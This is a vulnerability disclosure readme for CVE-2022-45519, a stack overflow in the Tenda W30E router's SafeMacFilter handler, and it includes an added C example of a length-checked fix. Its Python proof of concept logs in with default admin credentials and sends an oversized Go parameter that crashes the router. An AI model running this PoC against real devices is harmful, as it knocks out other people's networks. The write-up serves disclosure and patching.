CVE-2022-45519: IOT_Vul/readme.md at main · z1r00/IOT_Vul
Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the Go parameter at /goform/SafeMacFilter.
Tenda W30E V1.0.1.25(633) Stack overflow vulnerability
Firmware information
Manufacturer's address: https://www.tenda.com.cn/
Firmware download address: https://www.tenda.com.cn/download/detail-2218.html
Affected version
Vulnerability details
In /goform/SafeMacFilter, when the menufacturer parameter is tenda, the Go parameter is copied to s by strcpy. There is no size check on Go before the copy, which leads to a stack overflow vulnerability.
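The unchecked strcpy described above, next to a length-checked version, as an added example (not code from the firmware or from the original readme). The function names and the 64-byte size of s are assumptions; the page does not give the real buffer size.

```c
#include <stdio.h>
#include <string.h>

#define S_SIZE 64   /* assumed: the page does not state the real size of s */

/* Before: the reported pattern. A Go value of S_SIZE bytes or more
 * is written past the end of s. Shown for contrast; never called here. */
size_t handle_go_unchecked(const char *go)
{
    char s[S_SIZE];
    strcpy(s, go);                  /* no size check */
    return strlen(s);
}

/* After: measure with a bound, reject oversize input, copy a known length.
 * Returns 0 on success, -1 if the value is missing or does not fit. */
int copy_go_checked(const char *go, char *s, size_t s_size)
{
    size_t n;
    if (go == NULL || s == NULL || s_size == 0)
        return -1;
    for (n = 0; n < s_size && go[n] != '\0'; n++)
        ;                           /* never scans more than s_size bytes */
    if (n >= s_size)                /* no room left for the terminating NUL */
        return -1;
    memcpy(s, go, n);
    s[n] = '\0';
    return 0;
}

/* Hypothetical handler: returns the accepted length, or -1 to signal
 * that the request should be refused instead of processed. */
int handle_go_checked(const char *go)
{
    char s[S_SIZE];
    if (copy_go_checked(go, s, sizeof s) != 0)
        return -1;
    return (int)strlen(s);
}

int main(void)
{
    char big[0x3000 + 1];           /* constructed input, same length as the PoC value */
    memset(big, 'a', 0x3000);
    big[0x3000] = '\0';
    printf("short: %d, oversized: %d\n",
           handle_go_checked("abc"), handle_go_checked(big));
    return 0;
}
```

Rejecting the request is preferable to silently truncating the value, because the oversized input then never reaches later processing.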
Poc
```python
import requests

# Oversized value for the Go parameter (0x3000 bytes)
cmd = b'menufacturer=tenda&Go=' + b'a' * 0x3000

url = b"http://192.168.10.103/login/Auth"
payload = b"http://192.168.10.103/goform/SafeMacFilter/?" + cmd

data = {
    "username": "admin",
    "password": "admin",
}

def attack():
    s = requests.session()
    # Log in to the web interface
    resp = s.post(url=url, data=data)
    print(resp.content)
    # Send the request to /goform/SafeMacFilter
    resp = s.post(url=payload, data=data)
    print(resp.content)

attack()
```
You can see that the router crashes. With further work, an exploit could be written to get a root shell.